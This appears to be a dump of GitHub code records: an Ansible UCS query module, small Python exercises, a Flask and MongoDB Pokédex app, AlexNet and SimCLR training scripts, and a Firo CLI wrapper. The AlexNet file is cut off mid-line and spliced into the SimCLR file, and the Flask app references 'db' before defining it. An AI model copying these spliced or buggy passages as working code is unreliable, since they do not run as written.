= {'metadata_version': '1.1',\n 'status': ['preview'],\n 'supported_by': 'community'}\n\nDOCUMENTATION = r'''\n---\nmodule: ucs_query\n\nshort_description: Queries UCS Manager objects by class or distinguished name\n\ndescription:\n -Queries UCS Manager objects by class or distinguished name.\n\nextends_documentation_fragment: ucs\n\noptions:\n class_ids:\n description:\n - One or more UCS Manager Class IDs to query.\n - As a comma separated list\n type: str\n\n distinguished_names:\n description:\n - One or more UCS Manager Distinguished Names to query.\n - As a comma separated list\n type: str\n\n delegate_to:\n description:\n - Where the module will be run\n default: localhost\n type: str\n\nrequirements:\n - ucsmsdk\n\nauthor:\n - John McDonough (@movinalot)\n - CiscoUcs (@CiscoUcs)\nversion_added: \"2.10\"\n'''\n\nEXAMPLES = r'''\n- name: Query UCS Class ID\n ucs_query:\n hostname: \"{{ ucs_hostname }}\"\n username: \"{{ ucs_username }}\"\n password: \"{{ 
ucs_password }}\"\n class_ids: computeBlade\n delegate_to: localhost\n\n- name: Query UCS Class IDs\n ucs_query:\n hostname: \"{{ ucs_hostname }}\"\n username: \"{{ ucs_username }}\"\n password: \"{{ ucs_password }}\"\n class_ids: computeBlade, fabricVlan\n delegate_to: localhost\n\n- name: Query UCS Distinguished Name\n ucs_query:\n hostname: \"{{ ucs_hostname }}\"\n username: \"{{ ucs_username }}\"\n password: \"{{ ucs_password }}\"\n distinguished_names: org-root\n delegate_to: localhost\n\n- name: Query UCS Distinguished Names\n ucs_query:\n hostname: \"{{ ucs_hostname }}\"\n username: \"{{ ucs_username }}\"\n password: \"{{ ucs_password }}\"\n distinguished_names: org-root, sys/rack-unit-1, sys/chassis-1/blade-2\n delegate_to: localhost\n'''\n\nRETURN = r'''\n#\n'''\n\nfrom ansible.module_utils.basic import AnsibleModule\nfrom ansible.module_utils.remote_management.ucs import UCSModule, ucs_argument_spec\n\n\ndef retrieve_class_id(class_id, ucs):\n return ucs.login_handle.query_classid(class_id)\n\n\ndef retrieve_distinguished_name(distinguished_name, ucs):\n return ucs.login_handle.query_dn(distinguished_name)\n\n\ndef make_mo_dict(ucs_mo):\n obj_dict = {}\n for mo_property in ucs_mo.prop_map.values():\n obj_dict[mo_property] = getattr(ucs_mo, mo_property)\n return obj_dict\n\n\ndef main():\n argument_spec = ucs_argument_spec\n argument_spec.update(\n class_ids=dict(type='str'),\n distinguished_names=dict(type='str'),\n delegate_to=dict(type='str', default='localhost'),\n )\n\n module = AnsibleModule(\n argument_spec,\n supports_check_mode=False,\n mutually_exclusive=[\n ['class_ids', 'distinguished_names'],\n ],\n )\n\n # UCSModule verifies ucsmsdk is present and exits on failure.\n # Imports are below for UCS object creation.\n ucs = UCSModule(module)\n err = False\n query_result = {}\n\n try:\n if module.params['class_ids']:\n class_ids = [\n x.strip() for x in module.params['class_ids'].split(',')\n ]\n for class_id in class_ids:\n query_result[class_id] = []\n ucs_mos = retrieve_class_id(class_id, ucs)\n if ucs_mos:\n for ucs_mo in ucs_mos:\n query_result[class_id].append(make_mo_dict(ucs_mo))\n\n ucs.result['objects'] = query_result\n\n elif module.params['distinguished_names']:\n distinguished_names = [\n x.strip()\n for x in module.params['distinguished_names'].split(',')\n ]\n for distinguished_name in distinguished_names:\n query_result[distinguished_name] = {}\n ucs_mo = retrieve_distinguished_name(distinguished_name, ucs)\n\n if ucs_mo:\n query_result[distinguished_name] = make_mo_dict(ucs_mo)\n\n ucs.result['objects'] = query_result\n\n except Exception as e:\n err = True\n ucs.result['msg'] = \"setup error: %s \" % str(e)\n\n if err:\n module.fail_json(**ucs.result)\n\n ucs.result['changed'] = False\n module.exit_json(**ucs.result)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"CiscoUcs/ucsm-ansible","sub_path":"library/ucs_query.py","file_name":"ucs_query.py","file_ext":"py","file_size_in_byte":4523,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"37"} +{"seq_id":"72988530027","text":"a=int(input(\"enter a value for factorial\"))\r\ntemp=a\r\nsum=0\r\nwhile (a):\r\n digitreminder=a%10\r\n print(\"digits are:\",digitreminder)\r\n fact = 1\r\n i=1\r\n while i<= digitreminder:\r\n fact=fact*i\r\n i+= 1\r\n print(fact)\r\n sum=sum+fact\r\n a = a // 10\r\nif temp==sum:\r\n print(temp,\"is a strong number\")\r\nelse:\r\n print(temp,\"is not a strong number\")\r\n","repo_name":"thahsinabdulla/Python","sub_path":"strong 
no.py","file_name":"strong no.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23595642478","text":"\"\"\"\n Print DB content\n\"\"\"\nfrom peewee import *\nfrom act7_model import Person, Job, Department\nfrom pprint import pprint\n\ndef main():\n\n database = SqliteDatabase('act7.db')\n\n try:\n database.connect()\n database.execute_sql('PRAGMA foreign_keys = ON;')\n query = (Person\n .select(Person, Job, Department)\n .join(Job, JOIN.INNER)\n .join(Department, JOIN.INNER)\n )\n\n for line in query:\n pprint(f'This employee {line.person_name} had this job {line.job.job_name} in {line.job.department.department_name} department')\n\n except Exception as e:\n print (e)\n\n finally:\n database.close()\n\nif __name__ == '__main__':\n main()","repo_name":"UWPCE-PythonCert-ClassRepos/Sp2018-Online","sub_path":"students/marc_charbo/assignment_7/activity_7/act7/print_db_content.py","file_name":"print_db_content.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28291099350","text":"\n#Albert Wan (same pokedex file as calvin chu)\n#SoftDev1 pd9\n#K11: Ay Mon Go Git It From Yer Flask\n#2020-03-09\n\n\nfrom flask import Flask, render_template, request, redirect, url_for\nfrom pymongo import MongoClient\nfrom bson.json_util import loads\nimport pprint, numbers\n\nclient = MongoClient()\ncollection = db.pokemon\ndb = client.ShortCircuit\n\nif (collection.count() == 0):\n f = open(\"pokedex.json\",\"r\")\n response = f.read()\n data = loads(response)\n f.close()\n for post in data['pokemon']:\n collection.insert_one(post)\n\ndef getID(id):\n arr = []\n for x in (collection.find({\"id\" : id})):\n arr.append(x)\n return arr\ndef getNum(num):\n arr = []\n for x in (collection.find({\"num\" : num})):\n arr.append(x)\n\n return arr\ndef getName(name):\n arr = []\n for x in (collection.find({\"name\" : name})):\n arr.append(x)\n\n return arr\ndef getImg(img):\n arr = []\n for x in (collection.find({\"img\" : img})):\n arr.append(x)\n\n return arr\ndef getType(t):\n arr = []\n for x in (collection.find({\"type\" : {\"$in\" : [t]}})):\n arr.append(x)\n\n return arr\ndef getCandy(c):\n arr = []\n for x in (collection.find({\"candy\" : c})):\n arr.append(x)\n return arr\ndef getCandyCount(c):\n arr = []\n for x in (collection.find({\"candy_count\" : c})):\n arr.append(x)\n return arr\ndef getMaxSpawnChance(c):\n arr= []\n for x in (collection.find({\"spawn_chance\" : {\"$lte\" : c}})):\n arr.append(x)\n return arr\ndef getMaxAvgSpawns(s):\n arr=[]\n for x in (collection.find({\"avg_spawns\" : {\"$lte\" : s}})):\n arr.append(x)\n return arr\ndef getSpawnTime(t):\n arr=[]\n for x in (collection.find({\"spawn_time\" : t})):\n arr.append(x)\n\n return arr\ndef getMultipliers(m):\n arr=[]\n for x in (collection.find({\"multipliers\" : {\"$in\" : [m]}})):\n arr.append(x)\n return arr\ndef getWeakness(w):\n arr=[]\n for x in (collection.find({\"weaknesses\" : {\"$in\" : [w]}})):\n arr.append(x)\n return arr\ndef getNextEvNum(n):\n arr=[]\n for x in (collection.find({\"next_evolution.num\" : n})):\n arr.append(x)\n return arr\ndef getNextEvName(n):\n arr=[]\n for x in (collection.find({\"next_evolution.name\" : n})):\n arr.append(x)\n return arr\ndef getPrevEvNum(n):\n arr=[]\n for x in (collection.find({\"prev_evolution.num\" : n})):\n arr.append(x)\n return arr\ndef getPrevEvName(n):\n arr=[]\n for x in 
(collection.find({\"prev_evolution.name\" : n})):\n arr.append(x)\n return arr\n\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef root():\n if (len(request.args) == 0 ):\n return render_template('poke.html')\n if (len(request.args['input']) == 0):\n return render_template('poke.html')\n else:\n if (request.args['search'] == 'id'):\n return render_template('app.html', var = getID(int(request.args['input'])))\n if (request.args['search'] == 'num'):\n return render_template('app.html', var = getNum(request.args['input']))\n if (request.args['search'] == 'name'):\n return render_template('app.html', var = getName(request.args['input']))\n if (request.args['search'] == 'img'):\n return render_template('app.html', var = getImg(request.args['input']))\n if (request.args['search'] == 'type'):\n return render_template('app.html', var = getType(request.args['input']))\n if (request.args['search'] == 'candy'):\n return render_template('app.html', var = getCandy(request.args['input']))\n elif (request.args['search'] == 'weakness'):\n return render_template('app.html', var = getWeakness(request.args['input']))\n\nif __name__ == \"__main__\":\n app.debug = True\n app.run()\n","repo_name":"bertw2002/workRepo","sub_path":"11_mongoflask/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42629684357","text":"with open('input.txt') as file:\r\n s = file.read().splitlines()[:9]\r\n from itertools import zip_longest\r\n\r\n transposed = list(zip_longest(*s))\r\n transposed_list = [str(tuples) for tuples in transposed]\r\n stripped_transposed_list = []\r\n for line in transposed_list:\r\n for ch in line:\r\n if not ch.isalpha():\r\n line = line.replace(ch, '').strip('')\r\n\r\n if len(line) != 0:\r\n if line != 'None':\r\n stripped_transposed_list.append(line)\r\n\r\n loading_area = {}\r\n for count, ele in enumerate(stripped_transposed_list, 1):\r\n loading_area[count] = [*ele]\r\n\r\nfile.close()\r\n\r\n\r\nwith open('input.txt') as file:\r\n transposed_list = (file.read()).splitlines()[10:]\r\n\r\nfor line in transposed_list:\r\n how_many, stack_from, stack_to = [int(line.split(' ')[i]) for i in (1, 3, 5)]\r\n gcc = loading_area[stack_from][:how_many]\r\n # comment out gcc.reverse for '`9001` upgrade' a.k.a. 
part 2\r\n gcc.reverse()\r\n loading_area[stack_to][:0] = gcc\r\n del loading_area[stack_from][:how_many]\r\n\r\nanswer = \"\"\r\nx = 1\r\nfor k in loading_area.items():\r\n answer += loading_area[x][0]\r\n x += 1\r\n\r\nprint(answer)\r\n","repo_name":"setvobis/advent-of-code-2022","sub_path":"d5.py","file_name":"d5.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14990943106","text":"from turtle import Turtle, Screen\nimport random\n\nscreen = Screen()\nscreen.setup(width=500, height=400)\ncolors = [\"red\", \"orange\", \"yellow\", \"green\", \"blue\", \"purple\"]\nnames = [\"lucho\", \"maria\", \"jose\", \"juan\", \"pedro\", \"carlos\"]\nall_turtles = []\ny_value = -150\n\n\n# Set turtles in their right positions\ndef set_positions(y_val):\n # is_race_on = False\n\n for turtle_index in range(0, 6):\n new_turtle = Turtle(shape=\"turtle\", )\n new_turtle.color(colors[turtle_index])\n new_turtle.penup()\n new_turtle.goto(x=-230, y=y_val)\n\n all_turtles.append(new_turtle)\n\n y_val += 60\n\n get_bet()\n\n\ndef get_bet():\n user_bet = (screen.textinput(title=\"Make your bet!\",\n prompt=\"Which turtle will win the race? Enter a color: \"))\n\n if user_bet in colors:\n print(f\"Your money is on: {user_bet}. Good Luck!\")\n else:\n print(\"Wrong color name, try again\")\n get_bet()\n\n is_race_on = True\n\n while is_race_on:\n for t in all_turtles:\n if t.xcor() > 230:\n is_race_on = False\n winner_color = t.pencolor()\n if winner_color == user_bet:\n print(f\"You Won! The {winner_color} turtle won the race!\")\n else:\n print(f\"You Lost! The {winner_color} turtle won the race!\")\n\n rand_distance = random.randint(0, 10)\n t.forward(rand_distance)\n\n\nset_positions(y_value)\nscreen.exitonclick()\n","repo_name":"LFCamacho-dev/PythonTurtleRace","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7830270870","text":"from torch import nn\nfrom torch.utils.data import dataset\nfrom torch.utils.data import dataloader\nimport torchvision.datasets as dset\nimport torch.optim\nimport torchvision.transforms as transforms\nfrom tqdm.auto import tqdm\nimport numpy as np\nimport json\n\nfrom model import AlexNet\nimport util\n'''\nfine tune the fully connected layer firstly\n'''\n\n\nlearning_rate=0.000001\nTESTING_MODE=0\nn_epochs=150#150\n\ntrain_loader,validation_loader,test_loader=util.load_transformd_CIFAR10_data()\n\n\n\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\nmodel=AlexNet()\npath='./lr0.001_adam_l2_1e-5/90_checkpoint'\nepoch,model_state_dict,optimizer_state_dict,loss= util.load_check_point(path)\n\nmodel.load_state_dict(model_state_dict)\n\nmodel.to(device)\n\n\ncriterion = nn.CrossEntropyLoss()\noptimizer = torch.optim.Adam(model.parameters(), lr=learning_rate, weight_decay=1e-5)\noptimizer.load_state_dict(optimizer_state_dict)\n\n\n\n\nlist_train_acc=[]\nlist_val_acc=[]\nwhile epoch None:\n assert cfg[\"parameter\"][\"epochs\"] > 0\n assert cfg[\"experiment\"][\"batches\"] > 0\n assert 1. 
> cfg[\"parameter\"][\"momentum\"] > 0.\n assert cfg[\"parameter\"][\"warmup_epochs\"] >= 0\n\n assert cfg[\"experiment\"][\"base_cnn\"] in {\"resnet18\", \"resnet50\"}\n assert cfg[\"experiment\"][\"lr\"] > 0.\n assert cfg[\"experiment\"][\"decay\"] >= 0.\n\n\ndef convert_vectors(\n cfg: OmegaConf, data_loader, model: ContrastiveModel, device: torch.device\n):\n \"\"\"\n Convert experiment to feature representations.\n :param cfg: Hydra's config instance\n :param data_loader: Tata loader for raw experiment.\n :param model: Pre-trained instance\n :param device: PyTorch's device instance\n :return: Tuple of tensors: features and labels.\n \"\"\"\n model.eval()\n new_X = []\n new_y = []\n with torch.no_grad():\n for x_batches, y_batches in data_loader:\n if cfg[\"parameter\"][\"use_full_encoder\"]:\n fs = model(x_batches.to(device))\n else:\n fs = model.encode(x_batches.to(device))\n\n new_X.append(fs)\n new_y.append(y_batches)\n\n X = torch.cat(new_X).cpu()\n y = torch.cat(new_y).cpu()\n\n return X, y\n\n\ndef centroid_eval(\n data_loader: DataLoader, device: torch.device, classifier: CentroidClassifier, top_k: int = 5\n) -> tuple:\n \"\"\"\n :param data_loader: DataLoader of downstream task.\n :param device: PyTorch's device instance\n :param classifier: Instance of CentroidClassifier\n :param top_k: The number of top-k to calculate accuracy.\n :return: Tuple of top-1 accuracy and top-k accuracy.\n \"\"\"\n num_samples = len(data_loader.dataset)\n classifier.eval()\n top_1_correct = 0\n top_k_correct = 0\n with torch.no_grad():\n for x, y in data_loader:\n y = y.to(device)\n pred_top_k = torch.topk(classifier(x.to(device)), dim=1, k=top_k)[1]\n pred_top_1 = pred_top_k[:, 0]\n\n top_1_correct += pred_top_1.eq(y.view_as(pred_top_1)).sum().item()\n if top_k > 1:\n top_k_correct += (pred_top_k == y.view(len(y), 1)).sum().item()\n\n return top_1_correct / num_samples, top_k_correct / num_samples\n\n\ndef learnable_eval(\n cfg: OmegaConf,\n classifier,\n training_data_loader: DataLoader,\n val_data_loader: DataLoader,\n device: torch.device\n) -> tuple:\n \"\"\"\n :param cfg: Hydra's config instance\n :param classifier: Instance of classifier. Either linear or nonlinear\n :param training_data_loader: Training data loader for a downstream task\n :param val_data_loader: Validation data loader for a downstream task\n :param device: PyTorch's device instance\n :return: tuple of train acc, train top-k acc, train loss, val acc, val top-k acc, and val loss.\n \"\"\"\n\n def calculate_accuracies_loss(classifier, data_loader: DataLoader, device: torch.device, top_k: int = 5) -> tuple:\n \"\"\"\n Auxiliary function to calculate accuracies and loss.\n :param classifier: Instance of classifier. Either linear or nonlinear\n :param data_loader: Data loader for a downstream task\n :param device: PyTorch's device instance\n :param top_k: The number of top-k to calculate accuracy. 
Note `top_k <= 1` is same to top1.\n :return: Tuple of top 1 acc, top k acc, and loss.\n \"\"\"\n\n classifier.eval()\n total_loss = 0.\n top_1_correct = 0\n top_k_correct = 0\n num_samples = len(data_loader.dataset)\n\n with torch.no_grad():\n for x, y in data_loader:\n optimizer.zero_grad()\n y = y.to(device)\n outputs = classifier(x.to(device))\n total_loss += torch.nn.functional.cross_entropy(outputs, y, reduction=\"sum\").item()\n\n pred_top_k = torch.topk(outputs, dim=1, k=top_k)[1]\n pred_top_1 = pred_top_k[:, 0]\n\n top_1_correct += pred_top_1.eq(y.view_as(pred_top_1)).sum().item()\n if top_k > 1:\n top_k_correct += (pred_top_k == y.view(len(y), 1)).sum().item()\n else:\n top_k_correct += top_1_correct\n\n return top_1_correct / num_samples, top_k_correct / num_samples, total_loss / num_samples\n\n epochs = cfg[\"parameter\"][\"epochs\"]\n num_training_samples = len(training_data_loader.dataset)\n total_steps = cfg[\"parameter\"][\"epochs\"] * int(np.ceil(num_training_samples / cfg[\"experiment\"][\"batches\"]))\n\n classifier.train()\n cross_entropy_loss = torch.nn.CrossEntropyLoss()\n\n optimizer = torch.optim.SGD(\n params=classifier.parameters(),\n lr=calculate_initial_lr(cfg),\n momentum=cfg[\"parameter\"][\"momentum\"],\n nesterov=True,\n weight_decay=cfg[\"experiment\"][\"decay\"]\n )\n\n cos_lr_scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=total_steps)\n\n train_accuracies = []\n train_top_k_accuracies = []\n val_accuracies = []\n val_top_k_accuracies = []\n train_losses = []\n val_losses = []\n for epoch in range(1, epochs + 1):\n sum_loss = 0.\n for x, y in training_data_loader:\n optimizer.zero_grad()\n\n outputs = classifier(x.to(device))\n loss = cross_entropy_loss(outputs, y.to(device))\n\n loss.backward()\n optimizer.step()\n\n cos_lr_scheduler.step()\n sum_loss += loss.item() * len(y)\n\n average_loss = sum_loss / num_training_samples\n logging.info(\"Epoch:{}/{} progress:{:.3f} loss:{:.3f}, lr:{:.7f}\".format(\n epoch, epochs, epoch / epochs, average_loss, optimizer.param_groups[0][\"lr\"]\n ))\n\n train_acc, train_top_k_acc, train_loss = calculate_accuracies_loss(classifier, training_data_loader, device)\n train_accuracies.append(train_acc)\n train_losses.append(train_loss)\n train_top_k_accuracies.append(train_top_k_acc)\n\n val_acc, val_top_k_acc, val_loss = calculate_accuracies_loss(classifier, val_data_loader, device)\n val_accuracies.append(val_acc)\n val_top_k_accuracies.append(val_top_k_acc)\n val_losses.append(val_loss)\n\n return train_accuracies, train_top_k_accuracies, train_losses, val_accuracies, val_top_k_accuracies, val_losses\n\n\n@hydra.main(config_path=\"conf\", config_name=\"eval\")\ndef main(cfg: OmegaConf):\n logger = logging.getLogger(__name__)\n logger.setLevel(logging.INFO)\n stream_handler = logging.StreamHandler()\n stream_handler.setLevel(logging.INFO)\n stream_handler.terminator = \"\"\n logger.addHandler(stream_handler)\n\n check_hydra_conf(cfg)\n\n seed = cfg[\"parameter\"][\"seed\"]\n torch.manual_seed(seed)\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\n use_cuda = cfg[\"parameter\"][\"use_cuda\"] and torch.cuda.is_available()\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n logger.info(\"Using {}\".format(device))\n\n transform = transforms.Compose([transforms.ToTensor(), ])\n\n root = \"~/pytorch_datasets\"\n if cfg[\"experiment\"][\"name\"] == \"cifar10\":\n training_dataset = torchvision.datasets.CIFAR10(\n root=root, train=True, download=True, 
transform=transform\n )\n val_dataset = torchvision.datasets.CIFAR10(\n root=root, train=False, download=True, transform=transform\n )\n num_classes = 10\n elif cfg[\"experiment\"][\"name\"] == \"cifar100\":\n training_dataset = torchvision.datasets.CIFAR100(\n root=root, train=True, download=True, transform=transform\n )\n val_dataset = torchvision.datasets.CIFAR100(\n root=root, train=False, download=True, transform=transform\n )\n num_classes = 100\n else:\n assert cfg[\"experiment\"][\"name\"] in {\"cifar10\", \"cifar100\"}\n\n training_data_loader = DataLoader(\n dataset=training_dataset,\n batch_size=cfg[\"experiment\"][\"batches\"],\n shuffle=True,\n )\n val_data_loader = DataLoader(\n dataset=val_dataset,\n batch_size=cfg[\"experiment\"][\"batches\"],\n shuffle=False,\n )\n classification_results = {}\n\n top_k = cfg[\"parameter\"][\"top_k\"]\n for weights_path in Path(cfg[\"experiment\"][\"target_dir\"]).glob(\"*.pt\"):\n key = str(weights_path).split(\"/\")[-1]\n logger.info(\"Evaluation by using {}\".format(key))\n\n model = ContrastiveModel(base_cnn=cfg[\"experiment\"][\"base_cnn\"], d=cfg[\"parameter\"][\"d\"])\n model = torch.nn.SyncBatchNorm.convert_sync_batchnorm(model)\n model = model.to(device)\n\n state_dict = torch.load(weights_path)\n state_dict = {k.replace(\"module.\", \"\"): v for k, v in state_dict.items()}\n\n # load weights trained on self-supervised task\n if use_cuda:\n model.load_state_dict(state_dict, strict=False)\n else:\n model.load_state_dict(state_dict, strict=False, map_location=device)\n\n downstream_training_dataset = DownstreamDataset(*convert_vectors(cfg, training_data_loader, model, device))\n downstream_val_dataset = DownstreamDataset(*convert_vectors(cfg, val_data_loader, model, device))\n\n downstream_training_data_loader = DataLoader(\n dataset=downstream_training_dataset,\n batch_size=cfg[\"experiment\"][\"batches\"],\n shuffle=True,\n )\n downstream_val_data_loader = DataLoader(\n dataset=downstream_val_dataset,\n batch_size=cfg[\"experiment\"][\"batches\"],\n shuffle=False,\n )\n\n if cfg[\"parameter\"][\"classifier\"] == \"centroid\":\n classifier = CentroidClassifier(\n weights=CentroidClassifier.create_weights(downstream_training_dataset, num_classes=num_classes).to(\n device)\n )\n train_acc, train_top_k_acc = centroid_eval(downstream_training_data_loader, device, classifier, top_k)\n val_acc, val_top_k_acc = centroid_eval(downstream_val_data_loader, device, classifier, top_k)\n\n classification_results[key] = {\n \"train_acc\": train_acc,\n \"train_top_{}_acc\".format(top_k): train_top_k_acc,\n \"val_acc\": val_acc,\n \"val_top_{}_acc\".format(top_k): val_top_k_acc\n }\n logger.info(\"train acc: {}, val acc: {}\".format(train_acc, val_acc))\n\n else:\n if cfg[\"parameter\"][\"use_full_encoder\"]:\n num_last_units = model.g[-1].out_features\n else:\n num_last_units = model.g[0].in_features\n\n if cfg[\"parameter\"][\"classifier\"] == \"linear\":\n classifier = LinearClassifier(num_last_units, num_classes).to(device)\n elif cfg[\"parameter\"][\"classifier\"].replace(\"-\", \"\") == \"nonlinear\":\n classifier = NonLinearClassifier(num_last_units, num_classes).to(device)\n\n train_accuracies, train_top_k_accuracies, train_losses, val_accuracies, val_top_k_accuracies, val_losses = \\\n learnable_eval(cfg, classifier, downstream_training_data_loader, downstream_val_data_loader, device)\n\n classification_results[key] = {\n \"train_accuracies\": train_accuracies,\n \"val_accuracies\": val_accuracies,\n \"train_losses\": train_losses,\n 
\"val_losses\": val_losses,\n \"train_top_{}_accuracies\".format(top_k): train_top_k_accuracies,\n \"val_top_{}_accuracies\".format(top_k): val_top_k_accuracies,\n \"lowest_val_loss\": min(val_losses),\n \"highest_val_acc\": max(val_accuracies),\n \"highest_val_top_k_acc\": max(val_top_k_accuracies)\n }\n logger.info(\"train acc: {}, val acc: {}\".format(max(train_accuracies), max(val_accuracies)))\n\n fname = cfg[\"parameter\"][\"classification_results_json_fname\"]\n\n with open(fname, \"w\") as f:\n json.dump(classification_results, f)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"nzw0301/SimCLR","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":12483,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"2894322527","text":"# -*- coding=utf8 -*-\n\"\"\"\n 常量定义\n\"\"\"\nfrom zhihu.settings import USER_AGENT\n\nclass Gender(object):\n \"\"\"\n 性别定义\n \"\"\"\n MALE = 1\n FEMALE = 2\n\n\nclass People(object):\n \"\"\"\n 人员类型\n \"\"\"\n Followee = 1\n Follower = 2\n\n\nHEADER = {\n 'Host': 'www.zhihu.com',\n 'Connection': 'keep-alive',\n 'Pragma': 'no-cache',\n 'Cache-Control': 'no-cache',\n 'Accept': '*/*',\n 'Origin': 'https://www.zhihu.com',\n 'X-Requested-With': 'XMLHttpRequest',\n 'User-Agent': USER_AGENT,\n 'Content-Type': 'application/x-www-form-urlencoded',\n 'Accept-Encoding': 'gzip, deflate',\n 'Accept-Language': 'zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4',\n}\n","repo_name":"LiuRoy/zhihu_spider","sub_path":"zhihu/zhihu/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":1158,"dataset":"github-code","pt":"37"} +{"seq_id":"14345752149","text":"import json\nimport subprocess\nfrom time import sleep\nfrom util.config_loader import config\nfrom util.logger import logger\nfrom util.helper import is_valid_dict_string, print_command_title, is_process_running, dir_exists\n\nFIROD_PROCESS_NAME = 'firod'\nFIRO_CLI_EXE = 'firo-cli'\n\n\nclass FiroCli:\n\n def __init__(self, rpc_calls=None, firo_src_path=None, *args, **kwargs):\n\n if rpc_calls is None:\n raise AttributeError('List of names for rpc calls aren`t provided')\n\n if firo_src_path is None:\n raise AttributeError('Path to the ./firo-cli must be set')\n\n self._options = []\n self._methods = {}\n self._rpc_calls = set([item.strip() for item in rpc_calls.split(',')])\n self._firo_src = firo_src_path\n self._datadir = None\n\n try:\n self._datadir = kwargs['datadir']\n except KeyError as e:\n logger.warning('-datadir isn`t set. 
Using default.')\n\n if args:\n for value in args:\n self._options.append(f'-{value}')\n\n if kwargs:\n for key, value in kwargs.items():\n self._options.append(f'-{key}={value}')\n\n for call in self._rpc_calls:\n self._methods[call] = self._create_method(call)\n\n self._info()\n\n def __getattr__(self, attr):\n if attr in self._methods:\n return self._methods[attr]\n else:\n raise AttributeError(\n f\"No such command as '{attr}' in 'FiroCli'\\nAvailable RPC calls: {list(self._methods.keys())}\")\n\n def _info(self):\n logger.info('======= FIRO TESTING TOOL =======\\n')\n logger.info(f'Firo src directory path: {self._firo_src}')\n logger.info(f'List of supported rpc calls: {self._rpc_calls}')\n logger.info(f'Command options: {self._options}\\n')\n\n def _generate_command(self, exe, options):\n command = [f'./{exe}'] + options\n return command\n\n def _firo_cli(self, command):\n try:\n result = subprocess.run(command, stdout=subprocess.PIPE, cwd=self._firo_src, check=True)\n # decode the result to string\n decoded = result.stdout.decode('utf-8')\n logger.debug(f'Result:\\n{decoded}')\n # parse if json string\n if is_valid_dict_string(decoded):\n return json.loads(decoded)\n return decoded.strip()\n except subprocess.CalledProcessError as e:\n error_message = f\"Command failed with return code {e.returncode}: {e.output.decode()}\"\n logger.error(error_message)\n raise Exception(error_message)\n\n def _create_method(self, call):\n def method(command_argument=None):\n \"\"\"A dynamically created method\"\"\"\n\n assert is_process_running(\n FIROD_PROCESS_NAME), 'Firo Core should be running. Start Firo Core(firod) process `firo_cli.run_firo_core()`'\n\n logger.debug(f'Adding {call}() method to firo-cli')\n method_options = self._options + [f'{call}'] # add call to command options\n\n if command_argument:\n # append the arg value to command and parse the arg to string\n method_options.append(str(command_argument))\n\n print_command_title(call, [FIRO_CLI_EXE] + method_options, \"@\")\n command = self._generate_command(FIRO_CLI_EXE, method_options)\n return self._firo_cli(command)\n\n return method\n\n def run_firo_core(self, wait=5):\n\n blockchain_check = True\n if self._datadir:\n if not dir_exists(f'{self._datadir}/regtest'):\n logger.warning('Firo Core is starting without existing datadir for blockchain. '\n 'Need some time to generate it!')\n blockchain_check = False\n try:\n firod = is_process_running(FIROD_PROCESS_NAME)\n if firod:\n logger.warning('Firo Core is already running.')\n return firod\n else:\n logger.warning('Firo Core is not running. 
Starting Firo Core...')\n print_command_title('Starting Firo Core' ,[FIROD_PROCESS_NAME] + self._options, '%')\n # start Firo Core as a separate process\n command = self._generate_command(FIROD_PROCESS_NAME, self._options)\n firod = subprocess.Popen(command, stdout=subprocess.PIPE, cwd=self._firo_src)\n # Wait for the Firo Core process to start running\n counter = 0\n firod_finished = None\n while firod_finished is None and counter is not wait:\n logger.debug(f'Polling Firo Core - attempt: {counter + 1}')\n firod_finished = firod.poll()\n if firod_finished is not None:\n error = 'Firo Core stopped due to error!'\n logger.error(error)\n raise Exception(error)\n sleep(1) # Adjust the sleep duration as needed\n counter += 1\n logger.info('Firo Core is running.')\n if not blockchain_check:\n sleep(wait + 80)\n return firod\n except subprocess.CalledProcessError as e:\n error_message = f\"Command failed with return code {e.returncode}: {e.output.decode()}\"\n logger.error(error_message)\n raise Exception(error_message)\n\n def stop_firo_core(self):\n logger.warning('Stopping Firo Core...')\n firod = is_process_running(FIROD_PROCESS_NAME)\n if firod:\n pid = str(firod.pid)\n logger.warning(f'Terminating Firo Core process...')\n logger.debug(f'Firod process PID: {pid}')\n firod.terminate()\n firod.wait()\n logger.info('Firo Core process terminated successfully!')\n return\n logger.warning('Firo Core is not running. Noting to stop!')\n\n def rebroadcast_transaction(self, txid):\n raw_tx = self.getrawtransaction(txid.strip())\n self.sendrawtransaction(raw_tx.strip())\n\n\nif __name__ == \"__main__\":\n firo_cli = FiroCli(\n config.get('FIRO', 'spark_calls'),\n config.get('FIRO', 'firo_src'),\n 'regtest',\n datadir=config.get('FIRO', 'blockchain_datadir'))\n\n firo_cli.run_firo_core()\n count = int(firo_cli.getblockcount())\n logger.info(count)\n firo_cli.getsparkdefaultaddress()\n firo_cli.getbalance()\n firo_cli.getsparkaddressbalance('sr17k6c6e576vhj3rvtmdq8lg3uze8s9zj98j2e6zuzj7dlcfslxha7ghh2sdpj8chvm3mhe5ap5nwl4cwcmra29wqtyskp7luhqxxe0xek4s6ct8hz8ytug9p3mamw5yed9083n8q886k6x')\n 